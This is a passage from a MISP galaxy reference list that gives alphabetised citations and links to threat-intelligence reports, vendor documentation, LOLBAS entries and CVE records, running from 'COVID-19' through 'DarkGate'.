https://blogs.juniper.net/en-us/threat-research/covid-19-and-fmla-campaigns-used-to-install-new-icedid-banking-malware

PTSecurity Higaisa 2020

PT ESC Threat Intelligence. (2020, June 4). COVID-19 and New Year greetings: an investigation into the tools and methods used by the Higaisa group. Retrieved March 2, 2021.

The tag is: misp-galaxy:references="PTSecurity Higaisa 2020"

Table 13157. Table References

Links

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/covid-19-and-new-year-greetings-the-higaisa-group/

F-Secure CozyDuke

F-Secure Labs. (2015, April 22). CozyDuke: Malware Analysis. Retrieved December 10, 2015.

The tag is: misp-galaxy:references="F-Secure CozyDuke"

Table 13158. Table References

Links

https://www.f-secure.com/documents/996508/1030745/CozyDuke

TrendMicro CPL Malware Jan 2014

Mercês, F. (2014, January 27). CPL Malware - Malicious Control Panel Items. Retrieved January 18, 2018.

The tag is: misp-galaxy:references="TrendMicro CPL Malware Jan 2014"

Table 13159. Table References

Links

https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf

Trend Micro CPL

Merces, F. (2014). CPL Malware Malicious Control Panel Items. Retrieved November 1, 2017.

The tag is: misp-galaxy:references="Trend Micro CPL"

Table 13160. Table References

Links

https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf

SANS Brute Ratel October 2022

Thomas, W. (2022, October 5). Cracked Brute Ratel C4 framework proliferates across the cybercriminal underground. Retrieved February 6, 2023.

The tag is: misp-galaxy:references="SANS Brute Ratel October 2022"

Table 13161. Table References

Links

https://www.sans.org/blog/cracked-brute-ratel-c4-framework-proliferates-across-the-cybercriminal-underground/

Stealthbits Cracking AS-REP Roasting Jun 2019

Jeff Warren. (2019, June 27). Cracking Active Directory Passwords with AS-REP Roasting. Retrieved August 24, 2020.

The tag is: misp-galaxy:references="Stealthbits Cracking AS-REP Roasting Jun 2019"

Table 13162. Table References

Links

https://blog.stealthbits.com/cracking-active-directory-passwords-with-as-rep-roasting/

AdSecurity Cracking Kerberos Dec 2015

Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory Domain. Retrieved March 22, 2018.

The tag is: misp-galaxy:references="AdSecurity Cracking Kerberos Dec 2015"

Table 13163. Table References

Links

https://adsecurity.org/?p=2293

Dragos Crashoverride 2017

Dragos Inc. (2017, June 13). CRASHOVERRIDE Analysis of the Threat to Electric Grid Operations. Retrieved December 18, 2020.

The tag is: misp-galaxy:references="Dragos Crashoverride 2017"

Table 13164. Table References

Links

https://dragos.com/blog/crashoverride/CrashOverride-01.pdf

Unit 42 ATOM Crawling Taurus

Unit 42. (n.d.). Crawling Taurus. Retrieved September 14, 2023.

The tag is: misp-galaxy:references="Unit 42 ATOM Crawling Taurus"

Table 13165. Table References

Links

https://unit42.paloaltonetworks.com/atoms/crawling-taurus/

Microsoft Image

Microsoft. (2021, August 23). Create a managed image of a generalized VM in Azure. Retrieved October 13, 2021.

The tag is: misp-galaxy:references="Microsoft Image"

Table 13166. Table References

Links

https://docs.microsoft.com/en-us/azure/virtual-machines/windows/capture-image-resource

Microsoft Snapshot

Microsoft. (2021, September 16). Create a snapshot of a virtual hard disk. Retrieved October 13, 2021.

The tag is: misp-galaxy:references="Microsoft Snapshot"

Table 13167. Table References

Links

https://docs.microsoft.com/en-us/azure/virtual-machines/linux/snapshot-copy-managed-disk

Microsoft Create Token

Brower, N., Lich, B. (2017, April 19). Create a token object. Retrieved December 19, 2017.

The tag is: misp-galaxy:references="Microsoft Create Token"

Table 13168. Table References

Links

https://docs.microsoft.com/windows/device-security/security-policy-settings/create-a-token-object

GCP Create Cloud Identity Users

Google. (n.d.). Create Cloud Identity user accounts. Retrieved January 29, 2020.

The tag is: misp-galaxy:references="GCP Create Cloud Identity Users"

Table 13169. Table References

Links

https://support.google.com/cloudidentity/answer/7332836?hl=en&ref_topic=7558554

Createdump.exe - LOLBAS Project

LOLBAS. (2022, January 20). Createdump.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Createdump.exe - LOLBAS Project"

Table 13170. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Createdump/

Google Cloud Kubernetes IAM

Google Cloud. (n.d.). Create IAM policies. Retrieved July 14, 2023.

The tag is: misp-galaxy:references="Google Cloud Kubernetes IAM"

Table 13171. Table References

Links

https://cloud.google.com/kubernetes-engine/docs/how-to/iam

Microsoft CreateProcess

Microsoft. (n.d.). CreateProcess function. Retrieved December 5, 2014.

The tag is: misp-galaxy:references="Microsoft CreateProcess"

Table 13172. Table References

Links

http://msdn.microsoft.com/en-us/library/ms682425

Microsoft CLI Create Subscription

Microsoft. (n.d.). Create subscription. Retrieved August 4, 2023.

The tag is: misp-galaxy:references="Microsoft CLI Create Subscription"

Table 13173. Table References

Links

https://learn.microsoft.com/en-us/graph/api/subscription-post-subscriptions

create_sym_links

Microsoft. (2021, October 28). Create symbolic links. Retrieved April 27, 2022.

The tag is: misp-galaxy:references="create_sym_links"

Table 13174. Table References

Links

https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/create-symbolic-links

GCP - Creating and Starting a VM

Google. (2020, April 23). Creating and Starting a VM instance. Retrieved May 1, 2020.

The tag is: misp-galaxy:references="GCP - Creating and Starting a VM"

Table 13175. Table References

Links

https://cloud.google.com/compute/docs/instances/create-start-instance#api_2

AWS Create IAM User

AWS. (n.d.). Creating an IAM User in Your AWS Account. Retrieved January 29, 2020.

The tag is: misp-galaxy:references="AWS Create IAM User"

Table 13176. Table References

Links

https://docs.aws.amazon.com/IAM/latest/UserGuide/id_users_create.html

GNU Fork

Free Software Foundation, Inc. (2020, June 18). Creating a Process. Retrieved June 25, 2020.

The tag is: misp-galaxy:references="GNU Fork"

Table 13177. Table References

Links

https://www.gnu.org/software/libc/manual/html_node/Creating-a-Process.html

AppleDocs Launch Agent Daemons

Apple. (n.d.). Creating Launch Daemons and Agents. Retrieved July 10, 2017.

The tag is: misp-galaxy:references="AppleDocs Launch Agent Daemons"

Table 13178. Table References

Links

https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html

TechNet Logon Scripts

Microsoft. (2005, January 21). Creating logon scripts. Retrieved April 27, 2016.

The tag is: misp-galaxy:references="TechNet Logon Scripts"

Table 13179. Table References

Links

https://technet.microsoft.com/en-us/library/cc758918(v=ws.10).aspx

Google Cloud Service Account Credentials

Google Cloud. (2022, March 31). Creating short-lived service account credentials. Retrieved April 1, 2022.

The tag is: misp-galaxy:references="Google Cloud Service Account Credentials"

Table 13180. Table References

Links

https://cloud.google.com/iam/docs/creating-short-lived-service-account-credentials

creatingXPCservices

Apple. (2016, September 9). Creating XPC Services. Retrieved April 19, 2022.

The tag is: misp-galaxy:references="creatingXPCservices"

Table 13181. Table References

Links

https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingXPCServices.html#//apple_ref/doc/uid/10000172i-SW6-SW1

GitHub Creddump7

Flathers, R. (2018, February 19). creddump7. Retrieved April 11, 2018.

The tag is: misp-galaxy:references="GitHub Creddump7"

Table 13182. Table References

Links

https://github.com/Neohapsis/creddump7

Microsoft Midnight Blizzard Replay Attack

Microsoft Threat Intelligence. (2023, June 21). Credential Attacks. Retrieved September 27, 2023.

The tag is: misp-galaxy:references="Microsoft Midnight Blizzard Replay Attack"

Table 13183. Table References

Links

https://twitter.com/MsftSecIntel/status/1671579359994343425

Anomali Template Injection MAR 2018

Intel_Acquisition_Team. (2018, March 1). Credential Harvesting and Malicious File Delivery using Microsoft Office Template Injection. Retrieved July 20, 2018.

The tag is: misp-galaxy:references="Anomali Template Injection MAR 2018"

Table 13184. Table References

Links

https://forum.anomali.com/t/credential-harvesting-and-malicious-file-delivery-using-microsoft-office-template-injection/2104

Microsoft Credential Locker

Microsoft. (2013, October 23). Credential Locker Overview. Retrieved November 24, 2020.

The tag is: misp-galaxy:references="Microsoft Credential Locker"

Table 13185. Table References

Links

https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-8.1-and-8/jj554668(v=ws.11)?redirectedfrom=MSDN

Microsoft CredEnumerate

Microsoft. (2018, December 5). CredEnumerateA function (wincred.h). Retrieved November 24, 2020.

The tag is: misp-galaxy:references="Microsoft CredEnumerate"

Table 13186. Table References

Links

https://docs.microsoft.com/en-us/windows/win32/api/wincred/nf-wincred-credenumeratea

TrendmicroHideoutsLease

Max Goncharov. (2015, July 15). Criminal Hideouts for Lease: Bulletproof Hosting Services. Retrieved March 6, 2017.

The tag is: misp-galaxy:references="TrendmicroHideoutsLease"

Table 13187. Table References

Links

https://documents.trendmicro.com/assets/wp/wp-criminal-hideouts-for-lease.pdf

doppelpaymer_crowdstrike

Hurley, S. (2021, December 7). Critical Hit: How DoppelPaymer Hunts and Kills Windows Processes. Retrieved January 26, 2022.

The tag is: misp-galaxy:references="doppelpaymer_crowdstrike"

Table 13188. Table References

Links

https://www.crowdstrike.com/blog/how-doppelpaymer-hunts-and-kills-windows-processes/

Critical Vulnerabilities in PaperCut Print Management Software

Team Huntress. (2023, April 21). Critical Vulnerabilities in PaperCut Print Management Software. Retrieved May 8, 2023.

The tag is: misp-galaxy:references="Critical Vulnerabilities in PaperCut Print Management Software"

Table 13189. Table References

Links

https://www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software

Security Affairs SILENTTRINITY July 2019

Paganini, P. (2019, July 7). Croatia government agencies targeted with news SilentTrinity malware. Retrieved March 23, 2022.

The tag is: misp-galaxy:references="Security Affairs SILENTTRINITY July 2019"

Table 13190. Table References

Links

https://securityaffairs.co/wordpress/88021/apt/croatia-government-silenttrinity-malware.html

Die.net Linux crontab Man Page

Paul Vixie. (n.d.). crontab(5) - Linux man page. Retrieved December 19, 2017.

The tag is: misp-galaxy:references="Die.net Linux crontab Man Page"

Table 13191. Table References

Links

https://linux.die.net/man/5/crontab

Symantec Frutas Feb 2013

Bingham, J. (2013, February 11). Cross-Platform Frutas RAT Builder and Back Door. Retrieved April 23, 2019.

The tag is: misp-galaxy:references="Symantec Frutas Feb 2013"

Table 13192. Table References

Links

https://www.symantec.com/connect/blogs/cross-platform-frutas-rat-builder-and-back-door

Bishop Fox Sliver Framework August 2019

Kervella, R. (2019, August 4). Cross-platform General Purpose Implant Framework Written in Golang. Retrieved July 30, 2021.

The tag is: misp-galaxy:references="Bishop Fox Sliver Framework August 2019"

Table 13193. Table References

Links

https://labs.bishopfox.com/tech-blog/sliver

Crowdstrike CrowdCast Oct 2013

Crowdstrike. (2013, October 16). CrowdCasts Monthly: You Have an Adversary Problem. Retrieved March 1, 2017.

The tag is: misp-galaxy:references="Crowdstrike CrowdCast Oct 2013"

Table 13194. Table References

Links

https://www.slideshare.net/CrowdStrike/crowd-casts-monthly-you-have-an-adversary-problem

Crowdstrike Global Threat Report Feb 2018

CrowdStrike. (2018, February 26). CrowdStrike 2018 Global Threat Report. Retrieved October 10, 2018.

The tag is: misp-galaxy:references="Crowdstrike Global Threat Report Feb 2018"

Table 13195. Table References

Links

https://crowdstrike.lookbookhq.com/global-threat-report-2018-web/cs-2018-global-threat-report

CrowdStrike GTR 2021 June 2021

CrowdStrike. (2021, June 7). CrowdStrike 2021 Global Threat Report. Retrieved September 29, 2021.

The tag is: misp-galaxy:references="CrowdStrike GTR 2021 June 2021"

Table 13196. Table References

Links

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

CrowdStrike Adversary Carbon Spider

CrowdStrike. (2022, June 01). CrowdStrike Adversary Carbon Spider. Retrieved June 01, 2022.

The tag is: misp-galaxy:references="CrowdStrike Adversary Carbon Spider"

Table 13197. Table References

Links

https://adversary.crowdstrike.com/en-US/adversary/carbon-spider/

CrowdStrike Adversary Cozy Bear

CrowdStrike. (2022, May 4). CrowdStrike Adversary Cozy Bear. Retrieved May 4, 2022.

The tag is: misp-galaxy:references="CrowdStrike Adversary Cozy Bear"

Table 13198. Table References

Links

https://adversary.crowdstrike.com/en-US/adversary/cozy-bear/

CrowdStrike Labyrinth Chollima Feb 2022

CrowdStrike. (2022, February 1). CrowdStrike Adversary Labyrinth Chollima. Retrieved February 1, 2022.

The tag is: misp-galaxy:references="CrowdStrike Labyrinth Chollima Feb 2022"

Table 13199. Table References

Links

https://web.archive.org/web/20210723190317/https://adversary.crowdstrike.com/en-US/adversary/labyrinth-chollima/

CrowdStrike Adversary Ocean Buffalo

CrowdStrike. (2022, June 25). CrowdStrike Adversary Ocean Buffalo. Retrieved June 25, 2022.

The tag is: misp-galaxy:references="CrowdStrike Adversary Ocean Buffalo"

Table 13200. Table References

Links

https://adversary.crowdstrike.com/en-US/adversary/ocean-buffalo/

CrowdStrike Adversary Venomous Bear

CrowdStrike. (2022, May 4). CrowdStrike Adversary Venomous Bear. Retrieved May 4, 2022.

The tag is: misp-galaxy:references="CrowdStrike Adversary Venomous Bear"

Table 13201. Table References

Links

https://adversary.crowdstrike.com/en-US/adversary/venomous-bear/

CrowdStrike Adversary Wizard Spider

CrowdStrike. (2022, June 23). CrowdStrike Adversary Wizard Spider. Retrieved June 23, 2022.

The tag is: misp-galaxy:references="CrowdStrike Adversary Wizard Spider"

Table 13202. Table References

Links

https://adversary.crowdstrike.com/en-US/adversary/wizard-spider/

Crowdstrike DriveSlayer February 2022

Thomas, W. et al. (2022, February 25). CrowdStrike Falcon Protects from New Wiper Malware Used in Ukraine Cyberattacks. Retrieved March 25, 2022.

The tag is: misp-galaxy:references="Crowdstrike DriveSlayer February 2022"

Table 13203. Table References

Links

https://www.crowdstrike.com/blog/how-crowdstrike-falcon-protects-against-wiper-malware-used-in-ukraine-attacks/

CrowdStrike Putter Panda

Crowdstrike Global Intelligence Team. (2014, June 9). CrowdStrike Intelligence Report: Putter Panda. Retrieved January 22, 2016.

The tag is: misp-galaxy:references="CrowdStrike Putter Panda"

Table 13204. Table References

Links

http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf

Softpedia MinerC

Cimpanu, C. (2016, September 9). Cryptocurrency Mining Malware Discovered Targeting Seagate NAS Hard Drives. Retrieved October 12, 2016.

The tag is: misp-galaxy:references="Softpedia MinerC"

Table 13205. Table References

Links

http://news.softpedia.com/news/cryptocurrency-mining-malware-discovered-targeting-seagate-nas-hard-drives-508119.shtml

Microsoft Cryptojacking 2023

Microsoft Threat Intelligence. (2023, July 25). Cryptojacking: Understanding and defending against cloud compute resource abuse. Retrieved September 5, 2023.

The tag is: misp-galaxy:references="Microsoft Cryptojacking 2023"

Table 13206. Table References

Links

https://www.microsoft.com/en-us/security/blog/2023/07/25/cryptojacking-understanding-and-defending-against-cloud-compute-resource-abuse/

Microsoft CryptUnprotectData April 2018

Microsoft. (2018, April 12). CryptUnprotectData function. Retrieved June 18, 2019.

The tag is: misp-galaxy:references="Microsoft CryptUnprotectData April 2018"

Table 13207. Table References

Links

https://docs.microsoft.com/en-us/windows/desktop/api/dpapi/nf-dpapi-cryptunprotectdata

Csc.exe - LOLBAS Project

LOLBAS. (2018, May 25). Csc.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Csc.exe - LOLBAS Project"

Table 13208. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Csc/

Cscript.exe - LOLBAS Project

LOLBAS. (2018, May 25). Cscript.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Cscript.exe - LOLBAS Project"

Table 13209. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Cscript/

csi.exe - LOLBAS Project

LOLBAS. (2018, May 25). csi.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="csi.exe - LOLBAS Project"

Table 13210. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Csi/

OWASP CSV Injection

Albinowax Timo Goosen. (n.d.). CSV Injection. Retrieved February 7, 2022.

The tag is: misp-galaxy:references="OWASP CSV Injection"

Table 13211. Table References

Links

https://owasp.org/www-community/attacks/CSV_Injection

Microsoft Subkey

Microsoft. (n.d.). CurrentControlSet\Services Subkey Entries. Retrieved November 30, 2014.

The tag is: misp-galaxy:references="Microsoft Subkey"

Table 13212. Table References

Links

http://support.microsoft.com/KB/103000

Microsoft SolarWinds Customer Guidance

MSRC. (2020, December 13). Customer Guidance on Recent Nation-State Cyber Attacks. Retrieved December 17, 2020.

The tag is: misp-galaxy:references="Microsoft SolarWinds Customer Guidance"

Table 13213. Table References

Links

https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/

Microsoft - Customer Guidance on Recent Nation-State Cyber Attacks

MSRC. (2020, December 13). Customer Guidance on Recent Nation-State Cyber Attacks. Retrieved December 30, 2020.

The tag is: misp-galaxy:references="Microsoft - Customer Guidance on Recent Nation-State Cyber Attacks"

Table 13214. Table References

Links

https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/

Login Scripts Apple Dev

Apple. (2016, September 13). Customizing Login and Logout. Retrieved April 1, 2022.

The tag is: misp-galaxy:references="Login Scripts Apple Dev"

Table 13215. Table References

Links

https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CustomLogin.html

TechNet Screensaver GP

Microsoft. (n.d.). Customizing the Desktop. Retrieved December 5, 2017.

The tag is: misp-galaxy:references="TechNet Screensaver GP"

Table 13216. Table References

Links

https://technet.microsoft.com/library/cc938799.aspx

CustomShellHost.exe - LOLBAS Project

LOLBAS. (2021, November 14). CustomShellHost.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="CustomShellHost.exe - LOLBAS Project"

Table 13217. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/CustomShellHost/

Symantec Naid in the Wild June 2012

Symantec Security Response. (2012, June 18). CVE-2012-1875 Exploited in the Wild - Part 1 (Trojan.Naid). Retrieved February 22, 2018.

The tag is: misp-galaxy:references="Symantec Naid in the Wild June 2012"

Table 13218. Table References

Links

https://www.symantec.com/connect/blogs/cve-2012-1875-exploited-wild-part-1-trojannaid

NVD CVE-2014-7169

National Vulnerability Database. (2017, September 24). CVE-2014-7169 Detail. Retrieved April 3, 2018.

The tag is: misp-galaxy:references="NVD CVE-2014-7169"

Table 13219. Table References

Links

https://nvd.nist.gov/vuln/detail/CVE-2014-7169

NVD CVE-2016-6662

National Vulnerability Database. (2017, February 2). CVE-2016-6662 Detail. Retrieved April 3, 2018.

The tag is: misp-galaxy:references="NVD CVE-2016-6662"

Table 13220. Table References

Links

https://nvd.nist.gov/vuln/detail/CVE-2016-6662

NVD CVE-2017-0176

National Vulnerability Database. (2017, June 22). CVE-2017-0176 Detail. Retrieved April 3, 2018.

The tag is: misp-galaxy:references="NVD CVE-2017-0176"

Table 13221. Table References

Links

https://nvd.nist.gov/vuln/detail/CVE-2017-0176

FireEye Attacks Leveraging HTA

Berry, A., Galang, L., Jiang, G., Leathery, J., Mohandas, R. (2017, April 11). CVE-2017-0199: In the Wild Attacks Leveraging HTA Handler. Retrieved October 27, 2017.

The tag is: misp-galaxy:references="FireEye Attacks Leveraging HTA"

Table 13222. Table References

Links

https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html

Microsoft CVE-2017-8625 Aug 2017

Microsoft. (2017, August 8). CVE-2017-8625 - Internet Explorer Security Feature Bypass Vulnerability. Retrieved October 3, 2018.

The tag is: misp-galaxy:references="Microsoft CVE-2017-8625 Aug 2017"

Table 13223. Table References

Links

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8625

NVD CVE-2019-3610

National Vulnerability Database. (2019, October 9). CVE-2019-3610 Detail. Retrieved April 14, 2021.

The tag is: misp-galaxy:references="NVD CVE-2019-3610"

Table 13224. Table References

Links

https://nvd.nist.gov/vuln/detail/CVE-2019-3610

CVMServer Vuln

Mickey Jin. (2021, June 3). CVE-2021-30724: CVMServer Vulnerability in macOS and iOS. Retrieved October 12, 2021.

The tag is: misp-galaxy:references="CVMServer Vuln"

Table 13225. Table References

Links

https://www.trendmicro.com/en_us/research/21/f/CVE-2021-30724_CVMServer_Vulnerability_in_macOS_and_iOS.html

Crowdstrike Kubernetes Container Escape

Manoj Ahuje. (2022, January 31). CVE-2022-0185: Kubernetes Container Escape Using Linux Kernel Exploit. Retrieved July 6, 2022.

The tag is: misp-galaxy:references="Crowdstrike Kubernetes Container Escape"

Table 13226. Table References

Links

https://www.crowdstrike.com/blog/cve-2022-0185-kubernetes-container-escape-using-linux-kernel-exploit/

CyberArk Labs Safe Mode 2016

Naim, D. (2016, September 15). CyberArk Labs: From Safe Mode to Domain Compromise. Retrieved June 23, 2021.

The tag is: misp-galaxy:references="CyberArk Labs Safe Mode 2016"

Table 13227. Table References

Links

https://www.cyberark.com/resources/blog/cyberark-labs-from-safe-mode-to-domain-compromise

Cyware Ngrok May 2019

Cyware. (2019, May 29). Cyber attackers leverage tunneling service to drop Lokibot onto victims’ systems. Retrieved September 15, 2020.

The tag is: misp-galaxy:references="Cyware Ngrok May 2019"

Table 13228. Table References

Links

https://cyware.com/news/cyber-attackers-leverage-tunneling-service-to-drop-lokibot-onto-victims-systems-6f610e44

Microsoft Phosphorus Oct 2020

Burt, T. (2020, October 28). Cyberattacks target international conference attendees. Retrieved March 8, 2021.

The tag is: misp-galaxy:references="Microsoft Phosphorus Oct 2020"

Table 13229. Table References

Links

https://blogs.microsoft.com/on-the-issues/2020/10/28/cyberattacks-phosphorus-t20-munich-security-conference/

Talos Seduploader Oct 2017

Mercer, W., et al. (2017, October 22). "Cyber Conflict" Decoy Document Used in Real Cyber Conflict. Retrieved November 2, 2018.

The tag is: misp-galaxy:references="Talos Seduploader Oct 2017"

Table 13230. Table References

Links

https://blog.talosintelligence.com/2017/10/cyber-conflict-decoy-document.html

FBI-search

FBI. (2022, December 21). Cyber Criminals Impersonating Brands Using Search Engine Advertisement Services to Defraud Users. Retrieved February 21, 2023.

The tag is: misp-galaxy:references="FBI-search"

Table 13231. Table References

Links

https://www.ic3.gov/Media/Y2022/PSA221221

Secureworks GOLD KINGSWOOD September 2018

CTU. (2018, September 27). Cybercriminals Increasingly Trying to Ensnare the Big Financial Fish. Retrieved September 20, 2021.

The tag is: misp-galaxy:references="Secureworks GOLD KINGSWOOD September 2018"

Table 13232. Table References

Links

https://www.secureworks.com/blog/cybercriminals-increasingly-trying-to-ensnare-the-big-financial-fish

Cybereason OSX Pirrit

Amit Serper. (2016). Cybereason Lab Analysis OSX.Pirrit. Retrieved December 10, 2021.

The tag is: misp-galaxy:references="Cybereason OSX Pirrit"

Table 13233. Table References

Links

https://cdn2.hubspot.net/hubfs/3354902/Content%20PDFs/Cybereason-Lab-Analysis-OSX-Pirrit-4-6-16.pdf

Zdnet Kimsuky Dec 2018

Cimpanu, C. (2018, December 5). Cyber-espionage group uses Chrome extension to infect victims. Retrieved August 26, 2019.

The tag is: misp-galaxy:references="Zdnet Kimsuky Dec 2018"

Table 13234. Table References

Links

https://www.zdnet.com/article/cyber-espionage-group-uses-chrome-extension-to-infect-victims/

FireEye APT32 May 2017

Carr, N. (2017, May 14). Cyber Espionage is Alive and Well: APT32 and the Threat to Global Corporations. Retrieved June 18, 2017.

The tag is: misp-galaxy:references="FireEye APT32 May 2017"

Table 13235. Table References

Links

https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html

Shadowserver Strategic Web Compromise

Adair, S., Moran, N. (2012, May 15). Cyber Espionage & Strategic Web Compromises – Trusted Websites Serving Dangerous Results. Retrieved March 13, 2018.

The tag is: misp-galaxy:references="Shadowserver Strategic Web Compromise"

Table 13236. Table References

Links

http://blog.shadowserver.org/2012/05/15/cyber-espionage-strategic-web-compromises-trusted-websites-serving-dangerous-results/

CyberKnow Tweet July 7 2022

Cyberknow20. (2022, July 7). CyberKnow Tweet July 7 2022. Retrieved October 10, 2023.

The tag is: misp-galaxy:references="CyberKnow Tweet July 7 2022"

Table 13237. Table References

Links

https://twitter.com/Cyberknow20/status/1545059177587871749

NSA NCSC Turla OilRig

NSA/NCSC. (2019, October 21). Cybersecurity Advisory: Turla Group Exploits Iranian APT To Expand Coverage Of Victims. Retrieved October 16, 2020.

The tag is: misp-galaxy:references="NSA NCSC Turla OilRig"

Table 13238. Table References

Links

https://media.defense.gov/2019/Oct/18/2002197242/-1/-1/0/NSA_CSA_Turla_20191021%20ver%204%20-%20nsa.gov.pdf

OPM Leak

Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS. Retrieved October 20, 2020.

The tag is: misp-galaxy:references="OPM Leak"

Table 13239. Table References

Links

https://www.opm.gov/cybersecurity/cybersecurity-incidents/

ExpressVPN PATH env Windows 2021

ExpressVPN Security Team. (2021, November 16). Cybersecurity lessons: A PATH vulnerability in Windows. Retrieved September 28, 2023.

The tag is: misp-galaxy:references="ExpressVPN PATH env Windows 2021"

Table 13240. Table References

Links

https://www.expressvpn.com/blog/cybersecurity-lessons-a-path-vulnerability-in-windows/

NCSC Cyclops Blink February 2022

NCSC. (2022, February 23). Cyclops Blink Malware Analysis Report. Retrieved March 3, 2022.

The tag is: misp-galaxy:references="NCSC Cyclops Blink February 2022"

Table 13241. Table References

Links

https://www.ncsc.gov.uk/files/Cyclops-Blink-Malware-Analysis-Report.pdf

Trend Micro Cyclops Blink March 2022

Haquebord, F. et al. (2022, March 17). Cyclops Blink Sets Sights on Asus Routers. Retrieved March 17, 2022.

The tag is: misp-galaxy:references="Trend Micro Cyclops Blink March 2022"

Table 13242. Table References

Links

https://www.trendmicro.com/en_us/research/22/c/cyclops-blink-sets-sights-on-asus-routers--.html

Cynet Ragnar Apr 2020

Gold, B. (2020, April 27). Cynet Detection Report: Ragnar Locker Ransomware. Retrieved June 29, 2020.

The tag is: misp-galaxy:references="Cynet Ragnar Apr 2020"

Table 13243. Table References

Links

https://www.cynet.com/blog/cynet-detection-report-ragnar-locker-ransomware/

Microsoft DACL May 2018

Microsoft. (2018, May 30). DACLs and ACEs. Retrieved August 19, 2018.

The tag is: misp-galaxy:references="Microsoft DACL May 2018"

Table 13244. Table References

Links

https://docs.microsoft.com/windows/desktop/secauthz/dacls-and-aces

Apple Developer Doco Archive Launchd

Apple. (2016, September 13). Daemons and Services Programming Guide - Creating Launch Daemons and Agents. Retrieved February 24, 2021.

The tag is: misp-galaxy:references="Apple Developer Doco Archive Launchd"

Table 13245. Table References

Links

https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html

Picus Daixin Team October 24 2022

Huseyin Can Yuceel. (2022, October 24). Daixin Team Targets Healthcare Organizations with Ransomware Attacks. Retrieved December 1, 2023.

The tag is: misp-galaxy:references="Picus Daixin Team October 24 2022"

Table 13246. Table References

Links

https://www.picussecurity.com/resource/blog/daixin-team-targets-healthcare-organizations-with-ransomware-attacks

Medium Eli Salem GuLoader April 2021

Salem, E. (2021, April 19). Dancing With Shellcodes: Cracking the latest version of Guloader. Retrieved July 7, 2021.

The tag is: misp-galaxy:references="Medium Eli Salem GuLoader April 2021"

Table 13247. Table References

Links

https://elis531989.medium.com/dancing-with-shellcodes-cracking-the-latest-version-of-guloader-75083fb15cb4

Lookout Dark Caracal Jan 2018

Blaich, A., et al. (2018, January 18). Dark Caracal: Cyber-espionage at a Global Scale. Retrieved April 11, 2018.

The tag is: misp-galaxy:references="Lookout Dark Caracal Jan 2018"

Table 13248. Table References

Links

https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf

Dark Clouds_Usenix_Mulazzani_08_2011

Martin Mulazzani, Sebastian Schrittwieser, Manuel Leithner, Markus Huber, and Edgar Weippl. (2011, August). Dark Clouds on the Horizon: Using Cloud Storage as Attack Vector and Online Slack Space. Retrieved July 14, 2022.

The tag is: misp-galaxy:references="Dark Clouds_Usenix_Mulazzani_08_2011"

Table 13249. Table References

Links

https://www.usenix.org/conference/usenix-security-11/dark-clouds-horizon-using-cloud-storage-attack-vector-and-online-slack

TrendMicro DarkComet Sept 2014

TrendMicro. (2014, September 03). DARKCOMET. Retrieved November 6, 2018.

The tag is: misp-galaxy:references="TrendMicro DarkComet Sept 2014"

Table 13250. Table References

Links

https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/DARKCOMET

DarkGate Loader delivered via Teams - Truesec

Jakob Nordenlund. (2023, September 6). DarkGate Loader delivered via Teams - Truesec. Retrieved October 20, 2023.

The tag is: misp-galaxy:references="DarkGate Loader delivered via Teams - Truesec"

Table 13251. Table References

Links

https://www.truesec.com/hub/blog/darkgate-loader-delivered-via-teams

Bleeping Computer DarkGate October 14 2023

Sergiu Gatlan. (2023, October 14). DarkGate malware spreads through compromised Skype accounts. Retrieved October 20, 2023.

The tag is: misp-galaxy:references="Bleeping Computer DarkGate October 14 2023"

Table 13252. Table References

Links

https://www.bleepingcomputer.com/news/security/darkgate-malware-spreads-through-compromised-skype-accounts/

Trend Micro DarkGate October 12 2023

Trent Bessell, Ryan Maglaque, Aira Marcelo, Jack Walsh, David Walsh. (2023, October 12). DarkGate Opens Organizations for Attack via Skype, Teams. Retrieved October 20, 2023.

The tag is: misp-galaxy:references="Trend Micro DarkGate October 12 2023"

Table 13253. Table References

Links

https://www.trendmicro.com/en_us/research/23/j/darkgate-opens-organizations-for-attack-via-skype-teams.html

DarkGate - Threat Breakdown Journey

0xToxin. (n.d.). DarkGate - Threat Breakdown Journey. Retrieved October 20, 2023.

The tag is: misp-galaxy:references="DarkGate - Threat Breakdown Journey"

Table 13254. Table References

Links

https://0xtoxin.github.io/threat%20breakdown/DarkGate-Camapign-Analysis/

